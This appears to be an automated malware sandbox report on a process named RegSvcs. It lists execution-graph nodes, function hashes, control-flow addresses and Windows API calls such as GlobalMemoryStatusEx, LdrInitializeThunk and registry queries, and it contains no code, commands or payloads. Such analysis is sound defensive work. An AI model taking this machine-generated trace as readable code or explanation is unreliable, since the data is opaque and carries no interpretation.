                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:9%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:2.7%
                                                                                                                          Total number of Nodes:146
                                                                                                                          Total number of Limit Nodes:9
                                                                                                                          execution_graph 56455 6d16970 56457 6d16985 56455->56457 56456 6d16c64 56457->56456 56458 6d17d38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 56457->56458 56459 6d17cbf GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 56457->56459 56462 6d17cd0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 56457->56462 56464 6d17eb3 56457->56464 56469 6d16c80 56457->56469 56475 6d16e18 56457->56475 56458->56457 56459->56457 56462->56457 56465 6d17eb4 56464->56465 56466 6d17ef6 56465->56466 56479 6d181c8 56465->56479 56483 6d181b8 56465->56483 56466->56457 56470 6d16ca1 56469->56470 56471 6d16cc4 56469->56471 56470->56457 56472 6d16cee 56471->56472 56509 6d16ee0 56471->56509 56517 6d16ed2 56471->56517 56472->56457 56477 6d16ee0 3 API calls 56475->56477 56478 6d16ed2 3 API calls 56475->56478 56476 6d16e3f 56476->56457 56477->56476 56478->56476 56487 6d18200 56479->56487 56496 6d181f0 56479->56496 56480 6d181d6 56480->56466 56484 6d181d6 56483->56484 56485 6d18200 2 API calls 56483->56485 56486 6d181f0 2 API calls 56483->56486 56484->56466 56485->56484 56486->56484 56488 6d18235 56487->56488 56489 6d1820d 56487->56489 56505 6d16800 56488->56505 56489->56480 56491 6d18256 56491->56480 56493 6d182bb 56493->56480 56494 6d1831e GlobalMemoryStatusEx 56495 6d1834e 56494->56495 56495->56480 56497 6d18235 56496->56497 56498 6d1820d 56496->56498 56499 6d16800 GlobalMemoryStatusEx 56497->56499 56498->56480 56501 6d18252 56499->56501 56500 6d18256 56500->56480 56501->56500 56502 6d182bb 56501->56502 56503 6d1831e GlobalMemoryStatusEx 56501->56503 56502->56480 56504 6d1834e 56503->56504 56504->56480 56506 6d182d8 GlobalMemoryStatusEx 56505->56506 56508 6d18252 56506->56508 56508->56491 56508->56493 56508->56494 56510 6d16ef4 56509->56510 56512 6d16f32 56509->56512 56515 6d16ee0 3 API calls 56510->56515 56516 6d16ed2 3 API calls 56510->56516 56511 6d16f0a 56525 6d17cd0 56511->56525 56535 6d17cbf 56511->56535 56512->56472 56515->56511 56516->56511 56518 6d16ef4 56517->56518 56520 6d16f32 56517->56520 56521 6d16ee0 3 API calls 56518->56521 56522 6d16ed2 3 API calls 56518->56522 56519 6d16f0a 56523 6d17cd0 3 API calls 56519->56523 56524 6d17cbf 3 API calls 56519->56524 56520->56472 56521->56519 56522->56519 56523->56520 56524->56520 56526 6d17cdb 56525->56526 56528 6d17d03 56525->56528 56526->56512 56527 6d17d59 56527->56512 56528->56527 56529 6d17df7 56528->56529 56532 6d17e05 56528->56532 56530 6d16e18 3 API calls 56529->56530 56531 6d17dfe 56530->56531 56531->56512 56532->56531 56533 6d181c8 3 API calls 56532->56533 56534 6d181b8 3 API calls 56532->56534 56533->56531 56534->56531 56536 6d17cdb 56535->56536 56538 6d17d03 56535->56538 56536->56512 56537 6d17d59 56537->56512 56538->56537 56539 6d17df7 56538->56539 56541 6d17e05 56538->56541 56540 6d16e18 3 API calls 56539->56540 56542 6d17dfe 56540->56542 56541->56542 56543 6d181c8 3 API calls 56541->56543 56544 6d181b8 3 API calls 56541->56544 56542->56512 56543->56542 56544->56542 56569 6c6b6a0 56570 6c6b6bf 56569->56570 56571 6c6b6f3 LdrInitializeThunk 56570->56571 56572 6c6b710 56571->56572 56554 6d1ca18 56555 6d1ca7e 56554->56555 56556 6d1cb2d 56555->56556 56559 6d1cbc9 56555->56559 56563 6d1cbd8 56555->56563 56560 6d1cbd8 56559->56560 56566 6d1c5f4 56560->56566 56564 6d1c5f4 DuplicateHandle 56563->56564 56565 6d1cc06 56564->56565 56565->56556 56567 6d1cc40 DuplicateHandle 56566->56567 56568 6d1cc06 56567->56568 56568->56556 56577 169ad10 56578 169ad20 56577->56578 56581 1699b8c 56578->56581 56580 169ad65 56583 169c830 LoadLibraryA 56581->56583 56584 169c90c 56583->56584 56585 1694090 56586 16940a4 56585->56586 56589 16946e2 56586->56589 56587 16940ad 56593 16946eb 56589->56593 56595 16948de 56589->56595 56600 16947b8 56589->56600 56605 16947c8 56589->56605 56610 16948c4 56589->56610 56593->56587 56596 16948f1 56595->56596 56597 1694903 56595->56597 56615 1694bc0 56596->56615 56620 1694bd0 56596->56620 56601 169480c 56600->56601 56602 1694903 56601->56602 56603 1694bc0 2 API calls 56601->56603 56604 1694bd0 2 API calls 56601->56604 56603->56602 56604->56602 56606 169480c 56605->56606 56607 1694903 56606->56607 56608 1694bc0 2 API calls 56606->56608 56609 1694bd0 2 API calls 56606->56609 56608->56607 56609->56607 56611 1694877 56610->56611 56612 1694903 56611->56612 56613 1694bc0 2 API calls 56611->56613 56614 1694bd0 2 API calls 56611->56614 56613->56612 56614->56612 56616 1694bd0 56615->56616 56625 1694c0f 56616->56625 56629 1694c20 56616->56629 56617 1694bee 56617->56597 56621 1694bde 56620->56621 56623 1694c0f RtlEncodePointer 56621->56623 56624 1694c20 RtlEncodePointer 56621->56624 56622 1694bee 56622->56597 56623->56622 56624->56622 56626 1694c5a 56625->56626 56627 1694c84 RtlEncodePointer 56626->56627 56628 1694cad 56626->56628 56627->56628 56628->56617 56630 1694c5a 56629->56630 56631 1694c84 RtlEncodePointer 56630->56631 56632 1694cad 56630->56632 56631->56632 56632->56617 56545 6c6e978 56549 6c6e997 56545->56549 56546 6c6ec01 56548 6c6dbb0 RegQueryValueExW 56548->56549 56549->56546 56549->56548 56550 6c6dba4 56549->56550 56551 6c6ec90 RegOpenKeyExW 56550->56551 56553 6c6ed56 56551->56553 56553->56553 56573 6c691a8 56574 6c691c7 LdrInitializeThunk 56573->56574 56576 6c691fb 56574->56576

                                                                                                                          Executed Functions

                                                                                                                          Function 06D90AB0 Relevance: 2.8, Instructions: 2808COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 169c92dd844ceb8c0f815cb97bb6453551c082d5bc54677adf4022113fd25723
                                                                                                                          • Instruction ID: 6f088325541a892cc2b3d66e9fbb30d0c7d2d1ff479e8a0ddcd22d8ee024f9d0
                                                                                                                          • Opcode Fuzzy Hash: 169c92dd844ceb8c0f815cb97bb6453551c082d5bc54677adf4022113fd25723
                                                                                                                          • Instruction Fuzzy Hash: 27530B30D1071A8ECB51EF68C884A99F7B1FF99314F15D69AE4587B221EB30AAC4CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C6A0 Relevance: 2.3, Strings: 1, Instructions: 1029COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8^k
                                                                                                                          • API String ID: 0-366859695
                                                                                                                          • Opcode ID: 6518375845c2f00a8b96551caac4a86bf9393fd5fb66c705bd7ebe8d04e2e8b5
                                                                                                                          • Instruction ID: 17095a8f3ee51dbef1713f82cc377f7206d91889bc1259200a2ee254c7f433d9
                                                                                                                          • Opcode Fuzzy Hash: 6518375845c2f00a8b96551caac4a86bf9393fd5fb66c705bd7ebe8d04e2e8b5
                                                                                                                          • Instruction Fuzzy Hash: 56829C30E146448FEFA4DBB8C8547ADB7A6AF85304F248079E10ADF395DB78D845CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C63C Relevance: 1.9, Strings: 1, Instructions: 623COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8^k
                                                                                                                          • API String ID: 0-366859695
                                                                                                                          • Opcode ID: 5ba8d2a925cb90ce9ad80d1bcc3ffa345ccdbb1152fcadbc14c112a1c2e64d37
                                                                                                                          • Instruction ID: 0f0b01e02322e815fcfe140fb8c4d49dc595b11123d28285a64461d6a43a8510
                                                                                                                          • Opcode Fuzzy Hash: 5ba8d2a925cb90ce9ad80d1bcc3ffa345ccdbb1152fcadbc14c112a1c2e64d37
                                                                                                                          • Instruction Fuzzy Hash: 6D326030E142488FEF64DFB8C4547ADBBB2AF85344F24C169D40A9F385DB749889CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06C6B6A0 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2091 6c6b6a0-6c6b70a call 6c6a6c0 call 6c6a7e0 LdrInitializeThunk 2101 6c6b853-6c6b870 call 6c65b60 call 6c65cf0 2091->2101 2102 6c6b710-6c6b72a 2091->2102 2116 6c6b875-6c6b87e 2101->2116 2102->2101 2105 6c6b730-6c6b74a 2102->2105 2110 6c6b750 2105->2110 2111 6c6b74c-6c6b74e 2105->2111 2113 6c6b753-6c6b7ae call 6c6821c 2110->2113 2111->2113 2123 6c6b7b4 2113->2123 2124 6c6b7b0-6c6b7b2 2113->2124 2125 6c6b7b7-6c6b851 call 6c6821c 2123->2125 2124->2125 2125->2116
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f04ba424274508f4692411a4cdf3dadaa02fc3c03d2aff4ab254f0dc39ccc957
                                                                                                                          • Instruction ID: e1203cc55560bb6030847a605bdf8a40d7f0f02ffe0fe0c13b21f34b727bf025
                                                                                                                          • Opcode Fuzzy Hash: f04ba424274508f4692411a4cdf3dadaa02fc3c03d2aff4ab254f0dc39ccc957
                                                                                                                          • Instruction Fuzzy Hash: 9B51B571A102069FCB44EBB1D899AAEB7B6BF84314F148529E4129F394EF34D9048BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D98AD8 Relevance: 1.5, Instructions: 1506COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8e7b539db90aded302a8f2e09902e2befa3af86228aa2650e65ae2cc770d7e51
                                                                                                                          • Instruction ID: cde58d5ac93d288f225ce5a3a904599910ddc4619076c2722fd894dd4ee3b4b7
                                                                                                                          • Opcode Fuzzy Hash: 8e7b539db90aded302a8f2e09902e2befa3af86228aa2650e65ae2cc770d7e51
                                                                                                                          • Instruction Fuzzy Hash: 63C2CE34A043458FDB55EBB4E86866D7BF2AF89300F1980A9E449DF395EF349C46CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9B680 Relevance: .7, Instructions: 726COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 730c5af31110d0be9a92be17e41fb9d5862cd477f9a6b562bfb4df3c4212f20c
                                                                                                                          • Instruction ID: a12ccfa7f164446cc3090273fdcad4eb5050917eb6759d705a4dd76cc042cd30
                                                                                                                          • Opcode Fuzzy Hash: 730c5af31110d0be9a92be17e41fb9d5862cd477f9a6b562bfb4df3c4212f20c
                                                                                                                          • Instruction Fuzzy Hash: DD429F30F102098FDF64DBB9D4546AEB7B6EF89314F21842AD405DB385EB78DD428BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D95D90 Relevance: .6, Instructions: 617COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1fbb48f950a1a2b6b0d9f610eea58937d7fd5a1a3cb42bd98700e38d97b6630b
                                                                                                                          • Instruction ID: e8cb95c0252b84208a2403581d7e31e9257368dbbd13a9a9c1e05593b5418656
                                                                                                                          • Opcode Fuzzy Hash: 1fbb48f950a1a2b6b0d9f610eea58937d7fd5a1a3cb42bd98700e38d97b6630b
                                                                                                                          • Instruction Fuzzy Hash: 7E22CC30F002459FEF55DBB8C854BAEBBF6AF89204F158569E005EB391DA34EC05CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9B530 Relevance: .4, Instructions: 439COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c0473dd4dca309d594fc37cb9c7e6157c07a26151ec39e0a2809b58fc44f4cc9
                                                                                                                          • Instruction ID: 65b7601194285b9fdd3404cbc28ba986024b6f8e2bf334243a619f877b2c767f
                                                                                                                          • Opcode Fuzzy Hash: c0473dd4dca309d594fc37cb9c7e6157c07a26151ec39e0a2809b58fc44f4cc9
                                                                                                                          • Instruction Fuzzy Hash: 72E1B170F102494FEFA4DBA8E8547AE7BB6EB89310F26842BD005DB385DA78DC418771
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D92F68 Relevance: .4, Instructions: 393COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 59cb3f5e1a9b0aac6a359d68f436cc2406db35c8b7335f261d46dace7cd8b501
                                                                                                                          • Instruction ID: 62674e234c09168fbed840b71b8023ce60edcfe50f2fa77be29b4c3c01a1650a
                                                                                                                          • Opcode Fuzzy Hash: 59cb3f5e1a9b0aac6a359d68f436cc2406db35c8b7335f261d46dace7cd8b501
                                                                                                                          • Instruction Fuzzy Hash: E2D1F431F102158FDF54DBB9C8943AEB7E2EB85324F1AC56AD019EB281CA35E845C7B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9A420 Relevance: 5.5, Strings: 4, Instructions: 524COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 6d9a420-6d9a439 1 6d9a43f-6d9a453 0->1 2 6d9a4f4-6d9a504 0->2 5 6d9a459 1->5 6 6d9a455-6d9a457 1->6 7 6d9a50c-6d9a513 2->7 167 6d9a506 call 6d9a410 2->167 168 6d9a506 call 6d9a420 2->168 169 6d9a506 call 6d9a6c4 2->169 8 6d9a45c-6d9a471 5->8 6->8 10 6d9a4b8-6d9a4e1 call 6d9a16c 8->10 11 6d9a473-6d9a482 8->11 15 6d9a4ec-6d9a4f2 10->15 16 6d9a4e3-6d9a4ea 10->16 17 6d9a488-6d9a48b 11->17 18 6d9a514 11->18 15->7 16->7 19 6d9a519-6d9a553 17->19 20 6d9a491-6d9a497 17->20 18->19 25 6d9a595-6d9a597 19->25 26 6d9a555-6d9a55a 19->26 20->10 22 6d9a499-6d9a4b6 20->22 22->10 27 6d9a599-6d9a59f 25->27 28 6d9a5a1-6d9a5b5 25->28 29 6d9a77b 26->29 30 6d9a560-6d9a563 26->30 32 6d9a5d6-6d9a5d8 27->32 49 6d9a5d0 28->49 50 6d9a5b7-6d9a5bb 28->50 34 6d9a780-6d9a7e5 29->34 33 6d9a569-6d9a56f 30->33 30->34 35 6d9a5da-6d9a5df 32->35 36 6d9a5e1-6d9a5ea 32->36 33->25 38 6d9a571-6d9a590 33->38 74 6d9a7eb-6d9a7fe 34->74 75 6d9a914-6d9a91e 34->75 35->36 39 6d9a644-6d9a647 35->39 46 6d9a5fa-6d9a60c 36->46 47 6d9a5ec-6d9a5f5 36->47 56 6d9a6a5-6d9a6b9 38->56 39->29 42 6d9a64d-6d9a650 39->42 42->34 45 6d9a656-6d9a65c 42->45 52 6d9a67d-6d9a68e 45->52 53 6d9a65e-6d9a67b 45->53 46->29 60 6d9a612-6d9a615 46->60 47->52 49->32 50->49 55 6d9a5bd-6d9a5ce 50->55 52->56 66 6d9a690-6d9a69f 52->66 53->52 55->32 55->49 76 6d9a6c0-6d9a757 56->76 60->34 65 6d9a61b-6d9a621 60->65 65->52 68 6d9a623-6d9a642 65->68 66->56 68->52 74->75 80 6d9a804-6d9a80d 74->80 93 6d9a759-6d9a75d 76->93 94 6d9a75f-6d9a765 76->94 82 6d9a813-6d9a83d 80->82 83 6d9a924-6d9a94f 80->83 102 6d9a8ff-6d9a903 82->102 103 6d9a843-6d9a8ec 82->103 87 6d9a951-6d9a95b 83->87 88 6d9a974-6d9a9f1 83->88 91 6d9a95d-6d9a96e 87->91 92 6d9a970-6d9a973 87->92 120 6d9aa13-6d9aab9 88->120 121 6d9a9f3-6d9ab60 88->121 91->92 93->94 97 6d9a767-6d9a76d 93->97 95 6d9a76f-6d9a778 94->95 97->95 104 6d9a91f 102->104 105 6d9a905-6d9a90e 102->105 103->102 104->83 105->75 105->80 157 6d9ab4c-6d9ab56 120->157 158 6d9aabf-6d9ab09 120->158 158->157 167->7 168->7 169->7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: \$\$\$\
                                                                                                                          • API String ID: 0-3238275731
                                                                                                                          • Opcode ID: 18cda1e07c91d7fe281f96fadf8fb81a054ca1473cae8b0329303e9b197fd6db
                                                                                                                          • Instruction ID: 42914c71deea9bc6b58d25180ace25731b8fb2eb104ab9f65ed5ab59da7da416
                                                                                                                          • Opcode Fuzzy Hash: 18cda1e07c91d7fe281f96fadf8fb81a054ca1473cae8b0329303e9b197fd6db
                                                                                                                          • Instruction Fuzzy Hash: 8702C271B102058FCF94EBB8D8596AE77F6BF88314B188529D416DB384EB34DD068BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06C6B2C8 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 385 6c6b2c8-6c6b2f4 389 6c6b5e7-6c6b60f 385->389 390 6c6b2fa-6c6b302 385->390 395 6c6b634-6c6b640 389->395 396 6c6b611-6c6b61b 389->396 391 6c6b4e0-6c6b4e6 390->391 393 6c6b310-6c6b31a 391->393 394 6c6b4ec-6c6b51a 391->394 397 6c6b344-6c6b38e 393->397 398 6c6b31c-6c6b33c 393->398 420 6c6b520-6c6b531 394->420 421 6c6b5ac-6c6b5c1 394->421 405 6c6b642-6c6b648 395->405 406 6c6b66a-6c6b66b 395->406 399 6c6b630-6c6b633 396->399 400 6c6b61d-6c6b62e 396->400 418 6c6b4b4-6c6b4c7 397->418 419 6c6b394-6c6b3a3 397->419 398->397 400->399 410 6c6b672-6c6b67e 405->410 411 6c6b64a-6c6b65f 405->411 412 6c6b680-6c6b683 406->412 413 6c6b66d-6c6b66f 406->413 410->412 416 6c6b684-6c6b6d7 call 6c6a6c0 call 6c6a7e0 411->416 417 6c6b661-6c6b669 411->417 413->410 450 6c6b6df-6c6b6e5 416->450 417->406 422 6c6b4d3 418->422 423 6c6b4ce 419->423 424 6c6b3a9-6c6b3ba 419->424 431 6c6b597-6c6b5a6 420->431 432 6c6b533-6c6b590 420->432 421->389 422->391 423->422 434 6c6b3c0-6c6b3e1 424->434 435 6c6b49f-6c6b4ae 424->435 431->420 431->421 432->431 448 6c6b3e7-6c6b3f0 434->448 449 6c6b4c9 434->449 435->418 435->419 448->423 451 6c6b3f6-6c6b497 448->451 449->423 453 6c6b6ec 450->453 451->435 456 6c6b6f3-6c6b70a LdrInitializeThunk 453->456 458 6c6b853-6c6b870 call 6c65b60 call 6c65cf0 456->458 459 6c6b710-6c6b72a 456->459 482 6c6b875-6c6b87e 458->482 459->458 465 6c6b730-6c6b74a 459->465 473 6c6b750 465->473 474 6c6b74c-6c6b74e 465->474 477 6c6b753-6c6b7ae call 6c6821c 473->477 474->477 493 6c6b7b4 477->493 494 6c6b7b0-6c6b7b2 477->494 496 6c6b7b7-6c6b851 call 6c6821c 493->496 494->496 496->482
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: j
                                                                                                                          • API String ID: 0-2137352139
                                                                                                                          • Opcode ID: 2a9ceb8c17fe14a43601e0a3928feb750949073a2827131ac774fbec36d3fa18
                                                                                                                          • Instruction ID: 4ced54580a596aa876ca1ae36f795f48396c6d32e75be75f911a367c07642ad4
                                                                                                                          • Opcode Fuzzy Hash: 2a9ceb8c17fe14a43601e0a3928feb750949073a2827131ac774fbec36d3fa18
                                                                                                                          • Instruction Fuzzy Hash: ADE1C230B102058FCB55EBB5D899AAEB7B2AF85304F1085A9E405DF395EF74DD06CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06C691A8 Relevance: 1.7, APIs: 1, Instructions: 185libraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2024 6c691a8-6c691f4 LdrInitializeThunk 2028 6c691fb-6c69207 2024->2028 2029 6c69425-6c69438 2028->2029 2030 6c6920d-6c69216 2028->2030 2031 6c6945f-6c69463 2029->2031 2032 6c6921c-6c69231 2030->2032 2033 6c6945a 2030->2033 2034 6c69465 2031->2034 2035 6c6946e 2031->2035 2037 6c69233-6c69246 2032->2037 2038 6c6924b-6c69266 2032->2038 2033->2031 2034->2035 2039 6c6946f 2035->2039 2040 6c693f9-6c693fd 2037->2040 2049 6c69274 2038->2049 2050 6c69268-6c69272 2038->2050 2039->2039 2042 6c693ff 2040->2042 2043 6c69408-6c69411 2040->2043 2042->2043 2046 6c69455 2043->2046 2047 6c69413-6c6941f 2043->2047 2046->2033 2047->2029 2047->2030 2051 6c69279-6c6927b 2049->2051 2050->2051 2052 6c69295-6c69330 2051->2052 2053 6c6927d-6c69290 2051->2053 2071 6c69332-6c6933c 2052->2071 2072 6c6933e 2052->2072 2053->2040 2073 6c69343-6c69345 2071->2073 2072->2073 2074 6c69347-6c69349 2073->2074 2075 6c693a3-6c693f7 2073->2075 2076 6c69357 2074->2076 2077 6c6934b-6c69355 2074->2077 2075->2040 2078 6c6935c-6c6935e 2076->2078 2077->2078 2078->2075 2080 6c69360-6c693a1 2078->2080 2080->2075
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552132761.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6c60000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 12397a80bf99951b9664e76574c1c98258c4ef1d446896e7789f6a26bf0dc3a2
                                                                                                                          • Instruction ID: 8e5e5302c400bfeef8ae0bc952354a8eadb832aecc7bf0542c99b3c5a5dcdbc8
                                                                                                                          • Opcode Fuzzy Hash: 12397a80bf99951b9664e76574c1c98258c4ef1d446896e7789f6a26bf0dc3a2
                                                                                                                          • Instruction Fuzzy Hash: E8715D30E10206CFDB54EFB5D5987AEB7B6FF84305F108828E0169B294EF799946CB84
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D18200 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2143 6d18200-6d1820b 2144 6d18235-6d18254 call 6d16800 2143->2144 2145 6d1820d-6d18234 call 6d167f4 2143->2145 2151 6d18256-6d18259 2144->2151 2152 6d1825a-6d182b9 2144->2152 2158 6d182bb-6d182be 2152->2158 2159 6d182bf-6d1834c GlobalMemoryStatusEx 2152->2159 2162 6d18355-6d1837d 2159->2162 2163 6d1834e-6d18354 2159->2163 2163->2162
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552227697.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d10000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2a021ce27c657fc2be48f70acc0474270c9ebc1b823fdb3dbeee5802825a0a68
                                                                                                                          • Instruction ID: f21c8e8c48e948d1d2cdf99938f1426937fbaa6774171c247315be4681f4072e
                                                                                                                          • Opcode Fuzzy Hash: 2a021ce27c657fc2be48f70acc0474270c9ebc1b823fdb3dbeee5802825a0a68
                                                                                                                          • Instruction Fuzzy Hash: 6B413472D147869FCB01DFA9D8443DEBBB0AF89210F09856AD408EB741DB789845CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06C6EEE9 Relevance: 1.6, APIs: 1, Instructions: 122registryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
